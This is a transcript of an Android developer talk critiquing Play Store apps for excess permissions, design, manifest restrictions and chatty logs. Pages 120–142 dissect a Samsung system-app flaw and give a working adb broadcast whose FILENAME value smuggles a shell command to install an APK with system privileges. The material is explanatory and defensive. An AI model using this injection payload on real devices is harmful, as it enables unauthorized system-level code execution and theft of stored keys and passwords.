Android App Bashing - Learn From the Biggest Fails on the Google Play Store - 16-9

Date post: 27-Dec-2015
Upload: andrejancevski
Description: Learn from the biggest fails on Google Play Store

Transcript
Page 1: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

ANDROID APP BASHING
LEARN FROM THE BIGGEST FAILS

Page 2:

Eyal LEZMY

http://eyal.fr

SLIDES http://bit.ly/andbigfails

Page 3:

01

IT ALL STARTS ON THE PLAY STORE

Page 4:

Page 5:

MINIMISE PERMISSIONS

Request only what your app requires

1/3 of apps request more permissions than they need

Users should prefer apps requesting the least permissions

Page 6:

MINIMISE PERMISSIONS

You don’t need permission
Use ContentProviders

Users should prefer apps requesting the least permissions
Page 7:

MINIMISE PERMISSIONS

Permissions are not required to launch another activity that has the permission

Page 8:

MINIMISE PERMISSIONS

Need a contact?

Page 9:

MINIMISE PERMISSIONS

Use the force, Luke

Page 10:

MINIMISE PERMISSIONS

Start the contact app (the Contacts app holds READ_CONTACTS; your app does not need it):

    // Phone = ContactsContract.CommonDataKinds.Phone, Contacts = ContactsContract.Contacts
    Intent intent = new Intent(Intent.ACTION_GET_CONTENT);
    intent.setType(Phone.CONTENT_ITEM_TYPE);
    startActivityForResult(intent, MY_REQUEST_CODE);

Handle the result (the returned URI carries a temporary read grant for that one contact):

    @Override
    protected void onActivityResult(int requestCode, int resultCode, Intent data) {
        super.onActivityResult(requestCode, resultCode, data);
        if (requestCode != MY_REQUEST_CODE || resultCode != RESULT_OK || data == null) {
            return;
        }
        Uri uri = data.getData();
        if (uri != null) {
            Cursor c = getContentResolver().query(uri,
                    new String[] {Contacts.DISPLAY_NAME, Phone.NUMBER},
                    null, null, null);
            // read DISPLAY_NAME and NUMBER from c, then close it
        }
    }

Page 11:

MINIMISE PERMISSIONS

Need a UUID?

NO!

TelephonyManager.getDeviceId()
Requires READ_PHONE_STATE permission

Settings.Secure.ANDROID_ID
Reset at every wipe
Not applicable in a multi-user environment

Page 12:

MINIMISE PERMISSIONS

Need a UUID?

YES!

Generate your own UUID and use the Backup API!

    String id = UUID.randomUUID().toString();

Page 13:

MINIMISE PERMISSIONS

Android Backup API

· The API is available on all Android devices.
· Manufacturers can implement their own transport and storage for the API.
· Each device has its own backup data.
· A new device will take a backup from a device associated with your Google account.
· IT'S NOT A SYNC API!
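An added example (not from the deck) of what pages 12 and 13 describe: the identifier is generated once with UUID.randomUUID(), kept in a SharedPreferences file, and that file is handed to a BackupAgentHelper so the same id comes back on a new device tied to the same Google account. No READ_PHONE_STATE is involved, and the user can still reset the id by clearing the app's data. The class, preference-file and key names (AppIdentity, IdentityBackupAgent, app_identity, install_id) are assumptions.

```java
import android.app.backup.BackupAgentHelper;
import android.app.backup.BackupManager;
import android.app.backup.SharedPreferencesBackupHelper;
import android.content.Context;
import android.content.SharedPreferences;
import java.util.UUID;

// Hypothetical helper: names below are assumptions, not from the deck.
public final class AppIdentity {
    static final String PREFS_NAME = "app_identity";   // assumed preferences file name
    static final String KEY_INSTALL_ID = "install_id"; // assumed key

    private AppIdentity() {}

    // Returns a stable per-install identifier without any dangerous permission.
    // The first call generates a random UUID; later calls return the stored one.
    public static synchronized String getInstallId(Context ctx) {
        SharedPreferences prefs = ctx.getSharedPreferences(PREFS_NAME, Context.MODE_PRIVATE);
        String id = prefs.getString(KEY_INSTALL_ID, null);
        if (id == null) {
            id = UUID.randomUUID().toString();
            prefs.edit().putString(KEY_INSTALL_ID, id).apply();
            // Tell the backup transport that our data changed, so the id is backed up
            // and restored on a new device associated with the same Google account.
            new BackupManager(ctx).dataChanged();
        }
        return id;
    }
}

// Registered in the manifest on <application> as android:backupAgent=".IdentityBackupAgent"
// with android:allowBackup="true" (assumed declaration).
class IdentityBackupAgent extends BackupAgentHelper {
    @Override
    public void onCreate() {
        // Back up only the identity preferences file, nothing else the app stores.
        addHelper("identity_prefs",
                new SharedPreferencesBackupHelper(this, AppIdentity.PREFS_NAME));
    }
}
```

Because the backup is per Google account and not a sync, two devices of the same user may end up with different ids until one of them is restored from backup; treat the value as an install id, not as a proof of device identity.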

Page 14:

02

MICROSOFT STORY EPISODE 1

Page 15:

? ? ?

Page 16:

LOOK AND FEEL

HOTMAIL / OUTLOOK.COM

Page 17:

LOOK AND FEEL

HOTMAIL / OUTLOOK.COM

SAME!

Page 18:

LOOK AND FEEL

FOLLOW THE GUIDELINES!
http://d.android.com/design

Page 19:

LOOK AND FEEL

Redesigned by Taylor Ling

Page 20:

LOOK AND FEEL

By Microsoft

Page 21:

LOOK AND FEEL

Page 22:

LOOK AND FEEL

FOLLOW THE GUIDELINES!
http://d.android.com/design

Page 23:

LOOK AND FEEL

FOLLOW THE GUIDELINES!
http://d.android.com/design

PLEASE!

Page 24:

03

MICROSOFT STORY EPISODE 2

Page 25:

Page 26:

XBOX MUSIC

Page 27:

XBOX MUSIC

Emulator (last devices configuration)

- Nexus 7
- S4
- Nexus 10
- Note 2
- Galaxy Nexus
- S3
- Mega
- Note 1
- XCover (Android 2.3)
- Tablets

Page 28:

XBOX MUSIC

Our Nutshell

Not compatible:
- Brand new devices: S4, Mega, HTC One, Xperia Z, ...
- Tablets: Nexus 7/10, Tab2, Tab3, Note 10.1, …
- Old devices: XCover

Page 29:

XBOX MUSIC

Our Nutshell

Compatible:
- Mainstream devices: S3, Galaxy Nexus, Note 2, Note 1, ...

Page 30:

XBOX MUSIC

The dark side of the force, Luke

Page 31:

XBOX MUSIC

Let’s look into the Manifest

Page 32:

XBOX MUSIC

    <uses-sdk android:minSdkVersion="14"
              android:targetSdkVersion="14" />

Excludes the old devices

Not recommended (Sept. 2013)

Page 33:

XBOX MUSIC

    <compatible-screens>
        <screen android:screenSize="small" android:screenDensity="ldpi" />
        <screen android:screenSize="small" android:screenDensity="mdpi" />
        <screen android:screenSize="small" android:screenDensity="hdpi" />
        <screen android:screenSize="small" android:screenDensity="xhdpi" />
        <screen android:screenSize="normal" android:screenDensity="ldpi" />
        <screen android:screenSize="normal" android:screenDensity="mdpi" />
        <screen android:screenSize="normal" android:screenDensity="hdpi" />
        <screen android:screenSize="normal" android:screenDensity="xhdpi" />
    </compatible-screens>

Excludes tablets

Excludes brand new devices (XXHDPI screens)

Too restrictive!

Page 34:

XBOX MUSIC

<compatible-screens>

“You should not use this element”
It can dramatically reduce the potential user base for your application

“Use it only as a last resort”
When the application absolutely does not work with specific screen configurations

“Instead, follow the guide to Supporting Multiple Screens”

Page 35:

XBOX MUSIC

<compatible-screens> does not accept xxhdpi, but you can instead specify 480 as the value

Page 36:

XBOX MUSIC

Nothing seems tricky...

Page 37:

XBOX MUSIC

XXHDPI: 7.7% of Android devices

Page 38:

XBOX MUSIC

Tablets: 11.2% of Android devices

Page 39:

XBOX MUSIC

Missing targets: 18.9% of the market

Page 40:

XBOX MUSIC

The Mistakes

Have they tested on new devices?

Ignoring the power users
Brand new devices are bought by power users and early adopters

Does not support preloading music
The app is not perfectly optimized for mobility. Why ignore nomad devices like tablets?

Page 41:

XBOX MUSIC

Return of the APK

Page 42:

XBOX MUSIC

A day after

Page 43:

XBOX MUSIC

A day after

They updated the app

Page 44:

XBOX MUSIC

    <supports-screens
        android:smallScreens="true"
        android:normalScreens="true"
        android:largeScreens="false"
        android:xlargeScreens="false" />

    <uses-sdk android:minSdkVersion="14"
              android:targetSdkVersion="18" />

Page 45:

XBOX MUSIC

(same <supports-screens> and <uses-sdk> as on page 44)

HURRAY!!

Page 46:

04

MICROSOFT STORY EPISODE 3

Page 47:

Page 48:

MICROSOFT OFFICE

Follows the guidelines… This time

Page 49:

MICROSOFT OFFICE

Not that bad
But it could be better

Page 50:

MICROSOFT OFFICE

Fight the confusion

The Office 365 offer is quite confusing
People used to buy Office licenses, not to subscribe to an Office service

They try to avoid confusion

Page 51:

MICROSOFT OFFICE

Page 52:

MICROSOFT OFFICE

The title is clear

Page 53:

MICROSOFT OFFICE

Is it explicit enough?

Page 54:

MICROSOFT OFFICE

Problem

Does not support tablet format
A productivity app has to be compatible with big screen formats

Microsoft’s answer on the Play Store:
- The app is optimized for a phone
- On tablet, you can use the Office Webapps
- We plan to enable editing with Webapps

Page 55:

MICROSOFT OFFICE

Other problems

Fewer features than the competitors
Does not support local files
Does not support editing

The backend seems not very ready
I have been stuck for 24 hours at the mobile activation, and I’m not alone

Page 56:

MICROSOFT OFFICE

Conclusion

Adapt your UI to screen sizes depending on your features

Differentiate your service from competitors
Especially when you are new on the market

Your backend has to support your mobile distribution

Page 57:

MICROSOFT OFFICE

One more thing!

Page 58:

MICROSOFT OFFICE

Check out the Manifest

Page 59:

MICROSOFT OFFICE

    <uses-permission android:name="android.permission.READ_LOGS"/>

    <uses-sdk android:minSdkVersion="14"
              android:targetSdkVersion="16" />

They support ICS+

READ_LOGS is shown to the user as “Read sensitive log data”

Page 60:

MICROSOFT OFFICE

Ignores READ_LOGS: Jelly Bean removed this feature

Accepts READ_LOGS: 38% of the supported devices

Page 61:

MICROSOFT OFFICE

Don’t do this

Why scare 100% of your users to use a feature with 38% of them?

Avoid using deprecated functions as much as possible

Page 62:

05

YAHOO! WEATHER

Page 63:

Page 64:

YAHOO WEATHER

Beautiful...

Page 65:

YAHOO WEATHER

Very good score

Page 66:

YAHOO WEATHER

Is it perfect?

Hell no!

Page 67:

YAHOO WEATHER

« Try not. Do. Or do not. There is no try. »
YODA

Page 68:

YAHOO WEATHER

A splashscreen

Page 69:

YAHOO WEATHER

Non native UI

Page 70:

YAHOO WEATHER

Non native UI

Page 71:

YAHOO WEATHER

Where is my status bar?

Page 72:

YAHOO WEATHER

Immersive experience (games, books, videos): hide the status bar

Multitasking (everything else): show the status bar

Page 73:

YAHOO WEATHER

When do you check the weather?

Morning?
- Choosing your clothes
- Eating your breakfast
- Checking your emails
- Looking after your kids

This is multitasking!

Page 74:

YAHOO WEATHER

YouTube: an immersive app

No status bar

Page 75:

YAHOO WEATHER

It allows multitasking inside the app

Playing video

Page 76:

YAHOO WEATHER

Samsung Video Player

Page 77:

YAHOO WEATHER

Samsung Video Player

Popup play

Page 78:

YAHOO WEATHER

About the context you have to think

Page 79:

06

FACEBOOK EPISODE 1

Page 80:

Page 81:

FACEBOOK

Under the hood

March 2013

Too many methods: LinearAlloc buffer overflow

The solution is to divide the code into several dex files and load them on demand

Page 82:

FACEBOOK

Under the hood

March 2013

The Facebook app source code was not modular enough to allow this at application level
“Too many of our classes are accessed directly by the Android framework”

They had to do it at system level, thanks to reflection
“We needed to inject our secondary dex files directly into the system class loader”

Page 83:

FACEBOOK

« More backwards compatibility for Facebook.
Another day, another private field accessed. »

GIT COMMENT, ANDROID SOURCE CODE
January 2013

Page 84:

FACEBOOK

    /**
     * List of dex/resource (class path) elements.
     * Should be called pathElements, but the Facebook app uses reflection
     * to modify 'dexElements' (http://b/7726934).
     */
    private final Element[] dexElements;

Android source code - DexPathList.java
Commit January 2013

Page 85:

FACEBOOK

Android code review, January 2013

Patch set 2
“lets facebook start (at least judging by logcat output)”

After manual testing
“facebook starts, though i don't have an account.”

Page 86:

FACEBOOK

This was not enough

They finally patched the Dalvik VM
Using a native hot fix to change the LinearAlloc buffer size

Page 87:

FACEBOOK

I feel dirty

Page 88:

FACEBOOK

In a nutshell

Modularity saves lives

Google seems to test some popular apps during integration
So they don’t break the system apps

Google hires engineers when Facebook hires sculptors
Inspired by Sayo Oladeji

Page 89:

07

FACEBOOK EPISODE 2

Page 90:

Page 91:

FACEBOOK HOME

A lock screen

Page 92:

FACEBOOK HOME

Several services supported

Page 93:

FACEBOOK HOME

And a launcher

Page 94:

FACEBOOK HOME

Page 95:

FACEBOOK HOME

The problem

The launcher is too simple
- No folders
- No widgets
- No dock (during the first months)

It used to be mandatory: lockscreen + launcher

Page 96:

FACEBOOK HOME

Page 97:

FACEBOOK HOME

Page 98:

FACEBOOK HOME

Opens the default launcher

Page 99:

FACEBOOK HOME

Spot the odd one out

Page 100:

FACEBOOK HOME

No, actually, there is no consistency

Page 101:

FACEBOOK HOME

Conclusion

Keep the platform spirit
To override native OS elements you first need to implement all the basic features the user is used to

Identify your weakest points
And prepare how to limit their impact

Page 102:

08

CANAL PLUS

Page 103:

Page 104:

CANAL+ TOUCH

This is the logcat:

Request: https://canalURL.com/1.5/getThmChannel.php...
Request: https://canalURL.com/1.5/getProgramThm.php...
Request: https://canalURL.com/1.4/programRediff.php...
Request: https://canalURL.com/1.5/VOD.php?release=1...
json response : {"token":{"url":"http:\/\/download....
Request: https://canalURL.com/1.4/getChannel.php?SE...
json response: {"token":{"url":"https:\/\/canalURL....
Request: https://canalURL.com/1.5/guideTvChannel.ph...
Request: https://canalURL.com/1.5/programInfo.php?U...
Request: https://canalURL.com/1.5/myTv.php?release=...

Page 105:

CANAL+ TOUCH

Chatty logs make reverse engineering easier
- HTTPS connection
- PHP backend
- All the URLs and parameters are known
- Some of the responses are known too

Page 106:

CANAL+ TOUCH

Chatty logs can bring really big security breaches

Page 107:

CANAL+ TOUCH

This is still the logcat:

https://canalURL.com/1.5/authentification.php?
login=[MY_LOGIN]&pass=[MY_CLEAR_PASSWORD]...

Page 108:

CANAL+ TOUCH

(same logcat line as on page 107)

Wait WHAT ?!

Page 109:

CANAL+ TOUCH

Shut the fuck up!

Control your log output
Easy method with BuildConfig.DEBUG

Never send a clear password over the network
NEVAAAAAAA!!!!

Page 110:

CANAL+ TOUCH

Avoid the leak, easily:

    import android.util.Log;

    // Wrapper class name is arbitrary; BuildConfig is generated by the build in the app's
    // package, with DEBUG true for debug builds and false for release builds.
    public final class L {
        public static final boolean SHOW_LOG = BuildConfig.DEBUG;

        public static void d(final String tag, final String msg) {
            if (SHOW_LOG) Log.d(tag, msg);
        }
    }

And test it during QA
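An added example going one step beyond the single BuildConfig.DEBUG gate on page 110 (this is not the deck's code): the wrapper keeps that switch and, in addition, redacts credential-looking query parameters before anything reaches logcat, so that even a debug build cannot print the page-107 line with the password in clear. The class name SafeLog and the list of parameter names in the regular expression are assumptions.

```java
import android.util.Log;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical wrapper around android.util.Log; not the deck's code.
// Assumes the app's generated BuildConfig class (present in every Gradle/ADT build).
public final class SafeLog {
    private static final boolean SHOW_LOG = BuildConfig.DEBUG;

    // Query parameters whose values must never reach logcat, in any build.
    // The parameter names are an assumption; extend the list for your own API.
    private static final Pattern SECRET_PARAM = Pattern.compile(
            "(?i)([?&](?:pass|password|pwd|token|secret|session)=)[^&\\s]*");

    private SafeLog() {}

    // Debug output exists only in debug builds, and is redacted even there.
    public static void d(String tag, String msg) {
        if (SHOW_LOG) Log.d(tag, redact(msg));
    }

    // Errors are usually worth keeping in release builds, but with the same redaction.
    public static void e(String tag, String msg, Throwable t) {
        Log.e(tag, redact(msg), t);
    }

    // Replaces the value of every credential-like query parameter with "[REDACTED]";
    // other parameters (login, release, ...) are left untouched.
    static String redact(String msg) {
        if (msg == null) return null;
        Matcher m = SECRET_PARAM.matcher(msg);
        return m.replaceAll("$1[REDACTED]");
    }
}
```

Calling SafeLog.d("net", url) with the page-107 URL leaves login= in place and replaces the pass= value, which is the state a release logcat should show during QA. The regex only covers query strings; a password posted in a JSON body or an HTTP header needs its own redaction before the body is logged.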

Page 111:

09

OEM SOFTWARE

Page 112:

OEM SOFTWARE

The Android framework

Many APKs implement the features

They often have system access, to use low level features

Page 113:

OEM SOFTWARE

Open bar?

Page 114:

OEM SOFTWARE

Let’s see

Page 115:

OEM SOFTWARE

Android OEM applications (in)security

Talk by ANDRE MOULU, Quarkslab

Page 116:

OEM SOFTWARE

Methodology

Reverse engineering using Androguard

A custom result environment:
- Manifest analysis
- Check for sensitive API usage
- Diff between OS versions (to find patches)

Page 117:

OEM SOFTWARE

The results on Samsung devices

12 vulnerabilities found:
- Leak personal information
- Access non-permitted features
- Silent SMS control
- Code injection
- ...

Similar vulnerabilities on many manufacturers' devices

Page 118:

OEM SOFTWARE

Gimme more!

Page 119:

OEM SOFTWARE

Search for sharedUserId = system
Sensitive user ID

Command execution
Sensitive usage

Find serviceModeApp.apk
= Very sensitive app!

Page 120:

OEM SOFTWARE

    <receiver name=".FTATDumpReceiver">
        <intent-filter>
            <action name="com.android.sec.FTAT_DUMP"></action>
        </intent-filter>
    </receiver>

    <receiver name=".FTATDumpReceiver" permission="...servicemodeapp.permission.KEYSTRING">
        <intent-filter>
            <action name="com.android.sec.FAILDUMP"></action>
        </intent-filter>
    </receiver>

Receiver declared twice

Page 121:

OEM SOFTWARE

(same manifest excerpt as on page 120)

A permission is asked for the FAILDUMP action

Page 122:

OEM SOFTWARE

(same manifest excerpt as on page 120)

No permission needed for the FTAT_DUMP action!!

Page 123:

OEM SOFTWARE

We read the FTATDumpReceiver source code

    public void onReceive(Context paramContext, Intent paramIntent) {
        String str1 = paramIntent.getAction();
        if (str1.equals("com.android.sec.FTAT_DUMP")) {
            String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");
            [...]
            String str9 = str8 + [...]
            Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);
            localIntent2.putExtra("FILENAME", str9);
            paramContext.startService(localIntent2);
        }
        [...]
    }

Pages 124-129 (same code, annotated step by step):

- Page 124: Intercepts the FTAT_DUMP action
- Page 125: Concats the FILENAME extra to str3
- Page 126: Other concatenations follow
- Page 127: Prepares an intent to FTATDumpService
- Page 128: Adds the final string to the intent
- Page 129: Starts the FTATDumpService with our FILENAME parameter as extra

Page 130:

OEM SOFTWARE

We then read the FTATDumpService source code

    public int onStartCommand(Intent paramIntent, ...) {
        final String str = paramIntent.getStringExtra("FILENAME");
        [...]
        new Thread(new Runnable() {
            public void run() {
                [...]
                if (FTATDumpService.this.DoShellCmd("dumpstate > /data/log/" + str + ".log"))
                    FTATDumpService.this.mHandler.sendEmptyMessage(1015);
                [...]
            }
        }).start();
        return 0;
    }

Pages 131-133 (same code, annotated step by step):

- Page 131: Extracts the FILENAME extra to str
- Page 132: Opens and starts a new thread
- Page 133: Seems to “do a shell command” with our FILENAME parameter concatenated

Page 134:

OEM SOFTWARE

This is the DoShellCmd function:

    private boolean DoShellCmd(String paramString) {
        [...]
        String[] arrayOfString = new String[3];
        arrayOfString[0] = "/system/bin/sh";
        arrayOfString[1] = "-c";
        arrayOfString[2] = paramString;
        [...]
        Runtime.getRuntime().exec(arrayOfString).waitFor();
        [...]
        return true;
    }

Pages 135-137 (same code, annotated step by step):

- Page 135: Creates a shell command and runs it
- Page 136: And our FILENAME parameter is still not modified
- Page 137: BINGO!

Page 138:

OEM SOFTWARE

Access to:
- All permissions declared by system apps (156 for this case)
- All files belonging to the system user: Wifi keys, password, PIN, gesture storage...

Page 139:

OEM SOFTWARE

    $ adb shell am broadcast -a com.android.sec.FTAT_DUMP --es FILENAME '../../../../../dev/null;
    /system/bin/pm install an.apk; #'
    Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) }
    Broadcast completed : result=0

A simple broadcast for the FTAT_DUMP action

Pages 140-142 (same command, annotated step by step):

- Page 140: We declare the FILENAME argument
- Page 141: We point the destination file to null
- Page 142: We execute our system command

Page 143:

OEM SOFTWARE

Open bar!

Page 144:

OEM SOFTWARE

Moral of the story

It happens at application level

Look after your app’s backdoors
- Don’t export local services
- Use a strict permission model

Consider every input as a threat
- Escape all sensitive parameters you receive
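An added example (not the vendor's or the deck's code) of the page-144 advice applied to the FTAT dump pattern shown above: the receiver is meant to be declared with android:exported="false" (or behind a signature permission), the FILENAME extra is validated against a whitelist and rejected rather than "escaped", and the dump tool is launched as an argv array with its output written by the service itself, so no /system/bin/sh -c ever parses the caller's string. The names SafeDumpReceiver, SafeDumpService and the action string are assumptions; dumpstate itself still needs the system privileges the vendor app had, which is exactly why the input must be distrusted.

```java
import android.app.Service;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.IBinder;
import android.util.Log;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.util.regex.Pattern;

// Hypothetical hardened counterpart of the FTATDumpReceiver / FTATDumpService pair.
// Assumed manifest declarations:
//   <receiver android:name=".SafeDumpReceiver" android:exported="false" />
//   <service  android:name=".SafeDumpService"  android:exported="false" />
public class SafeDumpReceiver extends BroadcastReceiver {
    static final String ACTION_DUMP = "com.example.SAFE_DUMP"; // assumed action name
    private static final String TAG = "SafeDump";

    // Whitelist: a short token of letters, digits, '_' and '-'. No '/', '.', ';', '#', spaces.
    private static final Pattern SAFE_NAME = Pattern.compile("[A-Za-z0-9_-]{1,64}");

    // True only for a FILENAME that can neither escape the log directory nor carry shell syntax.
    public static boolean isSafeFileName(String name) {
        return name != null && SAFE_NAME.matcher(name).matches();
    }

    @Override
    public void onReceive(Context ctx, Intent intent) {
        if (!ACTION_DUMP.equals(intent.getAction())) return;
        String name = intent.getStringExtra("FILENAME");
        if (!isSafeFileName(name)) {
            Log.w(TAG, "rejected dump request: bad FILENAME"); // never echo the input itself
            return;
        }
        Intent svc = new Intent(ctx, SafeDumpService.class);   // explicit intent, same package
        svc.putExtra("FILENAME", name);
        ctx.startService(svc);
    }
}

class SafeDumpService extends Service {
    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        final String name = intent == null ? null : intent.getStringExtra("FILENAME");
        // Re-validate: the service must not trust that only the receiver can reach it.
        if (!SafeDumpReceiver.isSafeFileName(name)) {
            stopSelf();
            return START_NOT_STICKY;
        }
        final File logDir = new File(getFilesDir(), "log"); // app-private, not /data/log
        new Thread(new Runnable() {
            @Override
            public void run() {
                try {
                    runDumpstate(logDir, name);
                } catch (IOException | InterruptedException e) {
                    Log.w("SafeDump", "dump failed", e);
                }
                stopSelf();
            }
        }).start();
        return START_NOT_STICKY;
    }

    // Runs the tool as an argv array (no "/system/bin/sh -c", so the string is never parsed
    // as a command) and streams its output into a file verified to sit inside logDir.
    static void runDumpstate(File logDir, String name) throws IOException, InterruptedException {
        if (!logDir.isDirectory() && !logDir.mkdirs()) throw new IOException("cannot create log dir");
        File out = new File(logDir, name + ".log");
        String base = logDir.getCanonicalPath() + File.separator;
        if (!out.getCanonicalPath().startsWith(base)) throw new IOException("path escapes log dir");
        Process p = new ProcessBuilder("dumpstate").redirectErrorStream(true).start();
        try (InputStream in = p.getInputStream(); OutputStream os = new FileOutputStream(out)) {
            byte[] buf = new byte[8192];
            int n;
            while ((n = in.read(buf)) != -1) os.write(buf, 0, n);
        }
        p.waitFor();
    }

    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }
}
```

With this shape, the page-139 broadcast would be dropped twice: the receiver is not reachable from outside the package, and even an in-package caller passing '../../../../../dev/null; ...' fails the whitelist before any process is started. The canonical-path check is redundant with the whitelist and is kept as a second line of defence in case the pattern is ever loosened.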

Page 145:

The Android emulator you ever dreamed of
www.genymotion.com

Page 146:

Thank You for your time!

http://eyal.fr

SLIDES http://bit.ly/andbigfails

